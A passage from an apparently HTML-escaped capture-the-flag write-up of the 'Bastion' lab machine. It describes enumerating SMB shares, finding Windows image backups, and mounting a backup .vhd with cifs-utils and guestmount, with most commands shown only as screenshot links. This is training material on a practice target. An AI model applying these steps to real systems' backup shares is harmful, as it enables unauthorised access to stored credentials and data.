&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- &lt;b&gt;IPC$&lt;/b&gt; seems accessible, but it does not yield any valuable information:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrGjmcgRol9OQ-hzQIMHDhohIPKHp1IDOukEQyrJ_9uNWPvRIa1TRumFbL48dXL6CdFtIwo-R64oTRAmovh85n_ky2XxG67CqZ_MXjns47qDiyIiOrfYB3gQK3y1GImRDklLd-gbVbHRes/s1600/screenshot.11.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrGjmcgRol9OQ-hzQIMHDhohIPKHp1IDOukEQyrJ_9uNWPvRIa1TRumFbL48dXL6CdFtIwo-R64oTRAmovh85n_ky2XxG67CqZ_MXjns47qDiyIiOrfYB3gQK3y1GImRDklLd-gbVbHRes/s1600/screenshot.11.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- However folder &lt;b&gt;Backups&lt;/b&gt; gives us a lot of very important information about &lt;b&gt;Bastion&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxie5b37aFKlU-8k4GyBXwh-vmca07rqfXk7mv9Cf_ixODI7cDAkc1TZUiVArN8Kga2BtYCayZF1By7kMwNBTF7fG9NSFAJDv8IUl0QybOVdtUqVz0E2lijsII-TVjDxLeESUdo9tYzQvZ/s1600/screenshot.12.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxie5b37aFKlU-8k4GyBXwh-vmca07rqfXk7mv9Cf_ixODI7cDAkc1TZUiVArN8Kga2BtYCayZF1By7kMwNBTF7fG9NSFAJDv8IUl0QybOVdtUqVz0E2lijsII-TVjDxLeESUdo9tYzQvZ/s1600/screenshot.12.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Getting and reading &lt;b&gt;note.txt&lt;/b&gt; it gives us a hint about backup related problems:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbzT84bpveWnXQhTo16ynCk2L1Tlh1mzIzBpf8S3EoghGluiP-venFdupyN_w0jnzpLrxXDrKgWECBzkpUdeOpyA9XmkhzdSKHyd2MTNlRL_LQC1Tf9BrEPfVH8PwedKvvrdrildNUXYSc/s1600/screenshot.13.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbzT84bpveWnXQhTo16ynCk2L1Tlh1mzIzBpf8S3EoghGluiP-venFdupyN_w0jnzpLrxXDrKgWECBzkpUdeOpyA9XmkhzdSKHyd2MTNlRL_LQC1Tf9BrEPfVH8PwedKvvrdrildNUXYSc/s1600/screenshot.13.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcwnaA-r_jj9_PEnZH2zszAnleG53AFYwpLh1nIKBPtjlIjKRvECzo1yo49a91lFx9bApZidoBF_7Mo0CUSrWHueF5w7jkET2qvlsOk6Pg0ye-s3xtwlsjAbeHRAiGtTzwpW3W74Iis8BD/s1600/screenshot.14.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcwnaA-r_jj9_PEnZH2zszAnleG53AFYwpLh1nIKBPtjlIjKRvECzo1yo49a91lFx9bApZidoBF_7Mo0CUSrWHueF5w7jkET2qvlsOk6Pg0ye-s3xtwlsjAbeHRAiGtTzwpW3W74Iis8BD/s1600/screenshot.14.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Getting and reading &lt;b&gt;SDT65CB.tmp&lt;/b&gt;&amp;nbsp;it seems that the file is empty:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE40dCMxxtbYfVmHft4pyCFd7PEasb3y0H8fVtV7ydv_5JyrvxdmLMN2pxkrUgdvmQ5wFFUrm4ve1OnpL2HpcAIloE2LfILAST1fnjDRAgEG044ohAMrTWGMnx2Ceb5xXdfPnYfdUcCHlM/s1600/screenshot.15.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE40dCMxxtbYfVmHft4pyCFd7PEasb3y0H8fVtV7ydv_5JyrvxdmLMN2pxkrUgdvmQ5wFFUrm4ve1OnpL2HpcAIloE2LfILAST1fnjDRAgEG044ohAMrTWGMnx2Ceb5xXdfPnYfdUcCHlM/s1600/screenshot.15.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga94UCcetDeXQbdrj0_EMOi395cWJGOFeUUEou1PyEozSW6BCxsUoJBEYINsekYIdE4fkuhL5qIVdisu1vC7fIHIU31CYiLFg5_ko5IkZ1QaIOeioaQO_MWeloNaJBny7522MNDmx3e0zw/s1600/screenshot.17.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga94UCcetDeXQbdrj0_EMOi395cWJGOFeUUEou1PyEozSW6BCxsUoJBEYINsekYIdE4fkuhL5qIVdisu1vC7fIHIU31CYiLFg5_ko5IkZ1QaIOeioaQO_MWeloNaJBny7522MNDmx3e0zw/s1600/screenshot.17.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Going into folder &lt;b&gt;WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBBy2wVbRNCegs3toX_47NiUAM0cN_Bvtrmnl2HeHo90JVgb1pCmAwVbXpZWVWlUpr6qLsh1psqy8bM-bVLOPGBpXhVSQSs5Z2rTUqqnwUiBP0364_Z8pEbPiLeLayokA89eU0EnjlFORg/s1600/screenshot.19.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBBy2wVbRNCegs3toX_47NiUAM0cN_Bvtrmnl2HeHo90JVgb1pCmAwVbXpZWVWlUpr6qLsh1psqy8bM-bVLOPGBpXhVSQSs5Z2rTUqqnwUiBP0364_Z8pEbPiLeLayokA89eU0EnjlFORg/s1600/screenshot.19.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- There are some &lt;b&gt;.vhd&lt;/b&gt; and &lt;b&gt;.xml&lt;/b&gt; files:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGJEQ8gttkSIN36b29ZKJLu_F1b6QKhxp468MG2E-e9F6W94HHEUJWJI2hMmX-NzIkyB9MsfgqwTy6RM_2MefxQBs0worSTO_SunkAK9upHTqRgqmuHzq3Vo1ywG0YtTsGpzg6MJ2Ukmgr/s1600/screenshot.20.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGJEQ8gttkSIN36b29ZKJLu_F1b6QKhxp468MG2E-e9F6W94HHEUJWJI2hMmX-NzIkyB9MsfgqwTy6RM_2MefxQBs0worSTO_SunkAK9upHTqRgqmuHzq3Vo1ywG0YtTsGpzg6MJ2Ukmgr/s1600/screenshot.20.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- &lt;b&gt;VHD (Virtual Hard Disk)&lt;/b&gt; is a file format representing a &lt;b&gt;virtual hard disk drive (HDD)&lt;/b&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- It is typically used as the hard disk of a virtual machine.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/VHD_(file_format)&quot;&gt;https://en.wikipedia.org/wiki/VHD_(file_format)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Getting the 1st &lt;b&gt;.vhd&lt;/b&gt; file and applying command &lt;b&gt;strings&lt;/b&gt; over it we find a lot of strings, but nothing that could lead to find any interesting hint for our purpose:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzb6JqWFxcKqVG9eQlpKBUkfqxcU_Co81ksfP9U1clQblX9t34nZyub8QKXdd3la-hogKIXcVGCmdK_Y8jEcThhA4qeEKBIx_fvHorGQFBZRX9RaK_FJBV7k8uTbfXTUVq02GQ73zDouZ2/s1600/screenshot.21.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzb6JqWFxcKqVG9eQlpKBUkfqxcU_Co81ksfP9U1clQblX9t34nZyub8QKXdd3la-hogKIXcVGCmdK_Y8jEcThhA4qeEKBIx_fvHorGQFBZRX9RaK_FJBV7k8uTbfXTUVq02GQ73zDouZ2/s1600/screenshot.21.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLIBaexZcgzZKodnvQMkEjby3u45gBrwazk4WZaN1kscgXfY0Bm9KWi2ycVjLmcDpmcQWRKR5nT8gEaACX1uViDAGYsBDvoPhu52EpJoRZX1srO72GDCKZC9fjrmGta-MQIAWGXuV7Ygwn/s1600/screenshot.22.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLIBaexZcgzZKodnvQMkEjby3u45gBrwazk4WZaN1kscgXfY0Bm9KWi2ycVjLmcDpmcQWRKR5nT8gEaACX1uViDAGYsBDvoPhu52EpJoRZX1srO72GDCKZC9fjrmGta-MQIAWGXuV7Ygwn/s1600/screenshot.22.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;............................&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;3 - EXPLOITATION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;3.1 - Mounting the backup .vhd disk&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;- About the 2nd &lt;b&gt;.vhd&lt;/b&gt; disk it is too large (5.4 GB) to check with strings, so it would be a better solution to mount it locally.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Installing &lt;b&gt;cifs-utils&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH-cngI_Puagj_5UcLuvMJqUP0zSo_Q3LfhsZHbdPO1-9tB0ViBLcyRDlz4f5m3TRrLZQR7KKO_rrucRinPjMNlkl26R9fy-aVlGkd8Oq5biRWSQxUCjBHSPoPdhvn_cLuKvtIuutQHClG/s1600/screenshot.51.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH-cngI_Puagj_5UcLuvMJqUP0zSo_Q3LfhsZHbdPO1-9tB0ViBLcyRDlz4f5m3TRrLZQR7KKO_rrucRinPjMNlkl26R9fy-aVlGkd8Oq5biRWSQxUCjBHSPoPdhvn_cLuKvtIuutQHClG/s1600/screenshot.51.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Creating folder &lt;b&gt;/Backups&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyBTY6atj77XtyM5akM3BIzHnlDBSz0xLMs1Nu4eWB-YEJZVJNuuw5MRlf8kMxqsPmdAOjJoa9xpWoMuFxPaqM4b_D87ggV19m-yuloc7e3Bglp8WX3bY_pEHKFBT7spv56LJIjw2cTz0H/s1600/screenshot.52.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyBTY6atj77XtyM5akM3BIzHnlDBSz0xLMs1Nu4eWB-YEJZVJNuuw5MRlf8kMxqsPmdAOjJoa9xpWoMuFxPaqM4b_D87ggV19m-yuloc7e3Bglp8WX3bY_pEHKFBT7spv56LJIjw2cTz0H/s1600/screenshot.52.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Mounting locally the shared folder &lt;b&gt;/Backups&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXCOtyH_dbYlL6vmojb1vvPj9RrdeYFQnbLyUhUeqHchEjvtg7LMdI2O1FqQfOOoGgZYTil33lkGgW5VDHick1Ix0XeUsbpRUimxHn4gXuvdS8duoTYG9Iw0M4mSMpqQYN1rWKXonPp7xi/s1600/screenshot.53.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXCOtyH_dbYlL6vmojb1vvPj9RrdeYFQnbLyUhUeqHchEjvtg7LMdI2O1FqQfOOoGgZYTil33lkGgW5VDHick1Ix0XeUsbpRUimxHn4gXuvdS8duoTYG9Iw0M4mSMpqQYN1rWKXonPp7xi/s1600/screenshot.53.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The mounting process is successful:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNVk_8C28CmhDNWRScogYPomVi4wcrXeiQZOilgsMU43-le5mPuiLYCYWeqTvSc-cJhOjwXt15yIv7O8uKgxqluJCiibQVo4MYO9ZiMWamOnNl153-ZjhOt9qDyLXPmhI5JJ5qqa2qQEIu/s1600/screenshot.54.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNVk_8C28CmhDNWRScogYPomVi4wcrXeiQZOilgsMU43-le5mPuiLYCYWeqTvSc-cJhOjwXt15yIv7O8uKgxqluJCiibQVo4MYO9ZiMWamOnNl153-ZjhOt9qDyLXPmhI5JJ5qqa2qQEIu/s1600/screenshot.54.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Looking for the 2nd &lt;b&gt;.vhd&lt;/b&gt; disk:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZXmHw9x4vrWGdVbFqtAfA4OaOlZxxxKIWiTdK-KncySSUQz-J3YuBecNiibkKLO21x_rH88eZ2hoJmjELl_4oV6JCFo2qd_ZIanFEq8WYFR9tGvfarkcrHLU5ya-aH-366zUEZti9DdT/s1600/screenshot.55.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ZXmHw9x4vrWGdVbFqtAfA4OaOlZxxxKIWiTdK-KncySSUQz-J3YuBecNiibkKLO21x_rH88eZ2hoJmjELl_4oV6JCFo2qd_ZIanFEq8WYFR9tGvfarkcrHLU5ya-aH-366zUEZti9DdT/s1600/screenshot.55.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The &lt;/span&gt;&lt;b style=&quot;font-family: arial, helvetica, sans-serif;&quot;&gt;guestmount&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt; program can be used to mount virtual machine filesystems and other disk images on the host.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
